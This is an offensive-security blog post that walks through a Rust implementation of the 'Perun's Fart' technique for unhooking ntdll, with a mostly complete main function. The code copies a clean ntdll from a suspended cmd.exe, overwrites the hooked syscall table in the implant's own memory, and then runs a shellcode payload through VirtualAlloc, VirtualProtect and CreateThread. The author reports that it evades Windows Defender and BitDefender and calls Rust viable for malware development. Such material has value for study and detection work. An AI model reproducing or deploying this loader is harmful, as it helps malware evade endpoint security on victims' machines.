I've been continuing to explore the capabilities of Rust, and I decided to take on a challenge: implementing Perun's Fart in Rust. Although this is not a novel technique, implementing it in Rust adds a new capability to the offensive toolset.
If you're not familiar with Perun's Fart, the methodology goes like this:
Execute implant.exe -> CreateProcess (Suspended) -> steal unhooked ntdll.dll from suspended process -> overwrite hooked syscall table in the memory of implant.exe -> execute malicious code
This technique is powerful because it lets us unhook our implant without bloating the PE file, as the byoDLL technique does, and without needing access to the copy of ntdll on disk. The technique is fairly well documented in other languages, so without further ado, let's look at the implementation in Rust.
Part Two: The Code
The code is fairly lengthy and can be found in its entirety on my GitHub, but the main function is included below for easy reference. It should be fairly straightforward to map the code below to the methodology outlined above.
fn main() {
let mut garbage = String::from("\0");
let mut attrsize: usize = Default::default();
let mut old_protect = PAGE_EXECUTE_READ;
let pDosHdr: * const IMAGE_DOS_HEADER;
let pNtHdr: *const IMAGE_NT_HEADERS64;
let pOptHdr: IMAGE_OPTIONAL_HEADER64;
unsafe{
let sacrificialProcess = b"cmd.exe\0";
let initProcess = b"C:\\Windows\\System32\0";
let mut pi:PROCESS_INFORMATION = mem::zeroed();
let mut si:STARTUPINFOEXA = mem::zeroed();
si.lpAttributeList = HeapAlloc(GetProcessHeap(), HEAP_GENERATE_EXCEPTIONS, attrsize) as LPPROC_THREAD_ATTRIBUTE_LIST;
si.StartupInfo.cb = mem::size_of::<STARTUPINFOA>() as u32;
InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &mut attrsize);
//create sacrificial process
CreateProcessA(
0 as *const u8,
sacrificialProcess.as_ptr() as *mut u8,
0 as * const SECURITY_ATTRIBUTES,
0 as * const SECURITY_ATTRIBUTES,
false as i32,
CREATE_NEW_CONSOLE | CREATE_SUSPENDED,
0 as *const c_void,
initProcess as *const u8,
&mut si.StartupInfo,
&mut pi
);
//get base addr of ntdll in memory
let pNtdllAddr = GetModuleBaseAddr("ntdll.dll");
//map ntdll
pDosHdr = pNtdllAddr as *mut IMAGE_DOS_HEADER;
pNtHdr = (pNtdllAddr as u64 + (*pDosHdr).e_lfanew as u64) as *mut IMAGE_NT_HEADERS64;
pOptHdr = (*pNtHdr).OptionalHeader;
//find first image section
let pCacheImgSectionHead = (pNtHdr as u64 + mem::size_of_val(&(*pNtHdr).Signature) as u64 +IMAGE_SIZEOF_FILE_HEADER as u64+(*pNtHdr).FileHeader.SizeOfOptionalHeader as u64) as * const IMAGE_SECTION_HEADER;
let target_section = [46, 116, 101, 120, 116, 0, 0, 0]; //.text
//find text section of ntdll in memory
let mut ntdll_addr = (pCacheImgSectionHead as u64 + (IMAGE_SIZEOF_SECTION_HEADER as u64)) as * const IMAGE_SECTION_HEADER;
for n in 0..((*pNtHdr).FileHeader.NumberOfSections as u64){
ntdll_addr = (pCacheImgSectionHead as u64 + (IMAGE_SIZEOF_SECTION_HEADER as u64 * n)) as * const IMAGE_SECTION_HEADER;
if (*ntdll_addr).Name == target_section{
break;
}
}
let ntdll_size = pOptHdr.SizeOfImage as usize;
//create cache
let pCache =
VirtualAlloc(
0 as *const c_void,
ntdll_size,
MEM_COMMIT,
PAGE_READWRITE);
//read sacrificial process ntdll.dll
let bytesRead = 0 as *mut usize;
ReadProcessMemory(
pi.hProcess,
pNtdllAddr as *mut c_void,
pCache,
ntdll_size,
bytesRead
);
println!("pCache: {:?}", pCache);
println!("pCache size: {:?}", ntdll_size);
stdin().read_line(&mut garbage).ok();
//kill sacrificial process
TerminateProcess(pi.hProcess, 0);
println!("\nRemove hooks?\n");
stdin().read_line(&mut garbage).ok();
//unhook ntdll.dll
Unhook(ntdll_addr as *mut c_void, pCache as *const c_void);
VirtualFree(pCache,0,MEM_RELEASE);
println!("Unhooking complete, run payload?");
stdin().read_line(&mut garbage).ok();
}
//msfvenom calc
let payload : [u8;276] = […snip…];
unsafe{
//println!("allocating payload mem");
//allocate payload mem
let payload_addr =
VirtualAlloc(
0 as *const c_void,
payload.len(),
MEM_COMMIT,
PAGE_READWRITE);
//println!("copying payload into mem");
//copy payload
std::ptr::copy(payload.as_ptr() as _, payload_addr, payload.len());
//println!("restoring payload mem permissions");
//change payload permissions
VirtualProtect(
(payload_addr) as *const c_void,
payload.len(),
PAGE_EXECUTE_READ,
&mut old_protect
);
//println!("creating thread");
let thread_fn = std::mem::transmute (payload_addr as *const u32);
//create thread
//thread_fn();
let thread =
CreateThread(
null_mut(),
0,
thread_fn,
null_mut(),
0,
null_mut());
WaitForSingleObject(thread, u32::MAX);
}
}
Part Three: Differences
In terms of program logic, there are no significant differences between the Rust implementation and implementations of this method in C, C++, or C#. However, because Rust is strict about types, the code above contains significantly more type conversions than I'm used to seeing.
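A good share of those conversions come from round-tripping pointers through u64 just to add an offset. As a minimal sketch (not code from the repository), the standard raw-pointer methods `add` and `cast` can express the same offset arithmetic while keeping the value a pointer the whole time. The helper name `ptr_at_offset` is hypothetical.

```rust
/// Hypothetical helper (not from the original code): returns a `*const T`
/// located `offset` bytes past `base`. It replaces the
/// `(base as u64 + offset as u64) as *const T` pattern without ever
/// converting the pointer to an integer.
///
/// # Safety
/// `base + offset` must stay within (or one past the end of) the same
/// allocation, as required by `pointer::add`.
unsafe fn ptr_at_offset<T>(base: *const u8, offset: usize) -> *const T {
    unsafe { base.add(offset).cast::<T>() }
}

fn main() {
    // Stand-in buffer with a u32 stored at byte offset 4.
    let mut buf = [0u8; 8];
    buf[4..8].copy_from_slice(&0x4550u32.to_ne_bytes());

    let p: *const u32 = unsafe { ptr_at_offset(buf.as_ptr(), 4) };
    // read_unaligned: a u8 buffer makes no alignment promise for a u32.
    let value = unsafe { p.read_unaligned() };
    println!("{value:#x}");
}
```

Because the offset is counted in bytes on a `*const u8` before the final `cast`, the arithmetic matches the original u64 math, and `read_unaligned` avoids assuming the target type's alignment.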
Additionally, at the time of writing, the windows-sys crate's support for parsing PE headers is not as robust or as well documented as what is available in other languages. For example, in the code above it was necessary to manually add the size of the Signature field when computing the address of the first section header, something C code typically gets from the IMAGE_FIRST_SECTION macro in winnt.h:
Rust Code:
let pCacheImgSectionHead = (pNtHdr as u64 + mem::size_of_val(&(*pNtHdr).Signature) as u64 +IMAGE_SIZEOF_FILE_HEADER as u64+(*pNtHdr).FileHeader.SizeOfOptionalHeader as u64) as * const IMAGE_SECTION_HEADER;
It might be possible to re-type a variable using the IMAGE_SECTION_HEADER0 type in the windows-sys crate instead, but the limited documentation on this mechanism made the solution above more practical at the time of writing.
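For comparison, here is a rough sketch (not the repository's code) of the same section-table walk in plain Rust over a byte buffer, with no windows-sys types at all. It assumes the buffer begins with the PE headers, reads the little-endian fields at the offsets fixed by the PE/COFF specification, and returns the matching section's VirtualAddress and VirtualSize. The names `find_section` and `synthetic_image` are hypothetical, and the synthetic header block exists only to exercise the function.

```rust
use std::convert::TryInto;

// Sizes fixed by the PE/COFF specification.
const IMAGE_SIZEOF_FILE_HEADER: usize = 20;
const IMAGE_SIZEOF_SECTION_HEADER: usize = 40;

/// Little-endian u16 at `off`, or None if the buffer is too short.
fn read_u16(buf: &[u8], off: usize) -> Option<u16> {
    Some(u16::from_le_bytes(buf.get(off..off + 2)?.try_into().ok()?))
}

/// Little-endian u32 at `off`, or None if the buffer is too short.
fn read_u32(buf: &[u8], off: usize) -> Option<u32> {
    Some(u32::from_le_bytes(buf.get(off..off + 4)?.try_into().ok()?))
}

/// Hypothetical helper: returns (VirtualAddress, VirtualSize) of the section
/// whose 8-byte name equals `name`, or None if it is absent or the headers
/// are malformed.
fn find_section(image: &[u8], name: &[u8; 8]) -> Option<(u32, u32)> {
    if image.get(0..2)? != b"MZ" {
        return None;
    }
    let nt = read_u32(image, 0x3C)? as usize; // IMAGE_DOS_HEADER.e_lfanew
    if image.get(nt..nt + 4)? != b"PE\0\0" {
        return None;
    }
    let file_header = nt + 4; // skip the 4-byte Signature
    let num_sections = read_u16(image, file_header + 2)? as usize;
    let size_of_optional = read_u16(image, file_header + 16)? as usize;
    // Signature + IMAGE_FILE_HEADER + optional header, as in the Rust line above.
    let first_section = file_header + IMAGE_SIZEOF_FILE_HEADER + size_of_optional;

    (0..num_sections).find_map(|i| {
        let sh = first_section + i * IMAGE_SIZEOF_SECTION_HEADER;
        if image.get(sh..sh + 8)? == name {
            // VirtualSize is at +8, VirtualAddress at +12.
            Some((read_u32(image, sh + 12)?, read_u32(image, sh + 8)?))
        } else {
            None
        }
    })
}

/// Builds a minimal fake header block with two sections (.data, .text).
fn synthetic_image() -> Vec<u8> {
    let mut img = vec![0u8; 0x200];
    img[0..2].copy_from_slice(b"MZ");
    img[0x3C..0x40].copy_from_slice(&0x40u32.to_le_bytes()); // e_lfanew
    img[0x40..0x44].copy_from_slice(b"PE\0\0");
    img[0x46..0x48].copy_from_slice(&2u16.to_le_bytes()); // NumberOfSections
    img[0x54..0x56].copy_from_slice(&0xF0u16.to_le_bytes()); // SizeOfOptionalHeader
    // Section table starts at 0x44 + 20 + 0xF0 = 0x148.
    img[0x148..0x150].copy_from_slice(b".data\0\0\0");
    img[0x170..0x178].copy_from_slice(b".text\0\0\0");
    img[0x178..0x17C].copy_from_slice(&0x1234u32.to_le_bytes()); // VirtualSize
    img[0x17C..0x180].copy_from_slice(&0x1000u32.to_le_bytes()); // VirtualAddress
    img
}

fn main() {
    // b".text\0\0\0" is the same 8 bytes as [46, 116, 101, 120, 116, 0, 0, 0].
    match find_section(&synthetic_image(), b".text\0\0\0") {
        Some((va, size)) => println!(".text: VirtualAddress={va:#x}, VirtualSize={size:#x}"),
        None => println!(".text not found"),
    }
}
```

Using `slice::get` means a truncated or corrupt header yields `None` instead of a panic or an out-of-bounds read, at the cost of a few more `?` operators.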
The sparse windows-sys documentation, combined with my limited understanding of Rust's memory model, made it harder than I initially expected to write the memory manipulations fluidly.
For example, the FindFirstSyscallFunction function, which locates the first bytes of the syscall table, searches for the byte pattern like this:
for n in 0..(memSize-3) as u64{
if *((memAddr as u64 +n) as PSTR) == pattern1[0]{
if *((memAddr as u64 +n+1) as PSTR) == pattern1[1]{
if *((memAddr as u64 +n+2) as PSTR) == pattern1[2]{
offset = n;
break;
}
}
}
}
This clumsy approach was the only manner in which I was able to retain the types necessary to conduct an adequate byte comparison. There is definitely a more idiomatic approach to solving this problem, and I welcome you to implement a better solution.
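One more idiomatic option, sketched here under the assumption that the region to search is available as a `&[u8]`, is to let `slice::windows` do the comparison. For a raw memory range, such a slice could be built with `std::slice::from_raw_parts(ptr, len)`, which is only sound if the whole range is readable for as long as the slice is used. The function name `find_pattern` and the bytes in the example are hypothetical, not the pattern the original tool searches for.

```rust
/// Hypothetical helper: returns the offset of the first occurrence of
/// `needle` in `haystack`, or None if it does not occur.
fn find_pattern(haystack: &[u8], needle: &[u8]) -> Option<usize> {
    if needle.is_empty() {
        return None; // slice::windows(0) would panic
    }
    // windows(n) yields every n-byte subslice, including the last one.
    haystack.windows(needle.len()).position(|w| w == needle)
}

fn main() {
    // Arbitrary example bytes; not the pattern used by the original tool.
    let memory = [0x90u8, 0x01, 0x02, 0x03, 0x04];
    match find_pattern(&memory, &[0x02, 0x03, 0x04]) {
        Some(offset) => println!("pattern found at offset {offset}"),
        None => println!("pattern not found"),
    }
}
```

Returning an `Option` makes the "not found" case explicit, where the loop above leaves `offset` unchanged. The example also shows a subtle difference: for a 3-byte pattern, `0..(memSize-3)` never tests the final starting position `memSize-3`, while `windows` covers it, which is where the match sits in this input.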
Part Four: ???
[Intentionally left blank]
Part Five: Profit
Upon compiling and executing the code in our target environment, we're able to validate that our approach works as designed. Even better, we can use a standard msfvenom calc payload without any modifications inside of our executable and still bypass detection by Windows Defender and BitDefender in the lab environment.
Hooked NtCreateThread
Unhooked NtCreateThread
Payload execution:
Part Six: Conclusion
In this writeup, we walked through a Rust implementation of the Perun's Fart unhooking technique. We successfully unhooked our in-memory copy of ntdll and then executed our payload, validating that the approach works.
We also saw how Rust requires a significantly more deliberate approach to variable types and memory manipulations than other languages, and some of the issues that this can cause for developers migrating to Rust.
Overall, the language is definitely viable for malware development and remains less detectable than similar C++ or C implementations of the same program. Personally, I will continue to explore the capabilities of Rust, but C and C++ will continue to be my primary development languages.
A special thanks to @0x4d5a for the help in developing the code discussed in this writeup. They have a solid set of offensive coding courses available at: https://redteamsorcery.teachable.com/